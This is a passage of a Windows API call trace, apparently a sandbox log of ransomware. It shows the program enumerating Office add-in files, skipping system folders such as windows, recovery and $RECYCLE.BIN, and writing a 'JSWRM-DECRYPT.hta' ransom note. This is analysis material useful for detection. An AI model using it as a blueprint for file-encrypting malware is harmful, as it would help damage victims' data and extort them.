[0123.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21be68 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.098] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa39cfa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa39cfa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa39cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0123.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0123.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x23aa80 [0123.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21be68 | out: hHeap=0x1e0000) returned 1 [0123.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.098] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x69980f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.098] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.099] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0123.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.099] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1920897, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1920897, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x196cd32, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.099] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.100] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1920897, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1920897, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x196cd32, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.100] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.100] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c40, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="EventSource.dll", cAlternateFileName="EVENTS~1.DLL")) returned 1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2=".") returned 1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="..") returned 1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="...") returned 1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="windows") returned -1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="recovery") returned -1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="perflogs") returned -1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="documents and settings") returned 1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="system volume information") returned -1 [0123.100] lstrcmpiW (lpString1="EventSource.dll", lpString2="msocache") returned -1 [0123.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0123.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EventSource.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0123.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EventSource.dll", cchWideChar=15, lpMultiByteStr=0x345e508, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EventSource.dll", lpUsedDefaultChar=0x0) returned 15 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0123.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EventSource.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0123.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EventSource.dll", cchWideChar=15, lpMultiByteStr=0x345e4d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EventSource.dll", lpUsedDefaultChar=0x0) returned 15 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2471d0 [0123.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.100] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="fi", cAlternateFileName="")) returned 1 [0123.100] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0123.100] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0123.101] lstrcmpiW (lpString1="fi", lpString2="...") returned 1 [0123.101] lstrcmpiW (lpString1="fi", lpString2="windows") returned -1 [0123.101] lstrcmpiW (lpString1="fi", lpString2="recovery") returned -1 [0123.101] lstrcmpiW (lpString1="fi", lpString2="perflogs") returned -1 [0123.101] lstrcmpiW (lpString1="fi", lpString2="documents and settings") returned 1 [0123.101] lstrcmpiW (lpString1="fi", lpString2="$RECYCLE.BIN") returned 1 [0123.101] lstrcmpiW (lpString1="fi", lpString2="system volume information") returned -1 [0123.101] lstrcmpiW (lpString1="fi", lpString2="msocache") returned -1 [0123.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0123.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\fi\\jswrm-decrypt.hta")) returned 0xffffffff [0123.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0123.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0123.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\fi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.103] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.103] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.104] CloseHandle (hObject=0x338) returned 1 [0123.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.105] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\fi\\jswrm-decrypt.hta")) returned 0x20 [0123.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.105] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fi\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4008f7c7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232180 [0123.105] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.105] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4008f7c7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.105] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.105] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.105] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4008f7c7, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4008f7c7, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4008f7c7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, 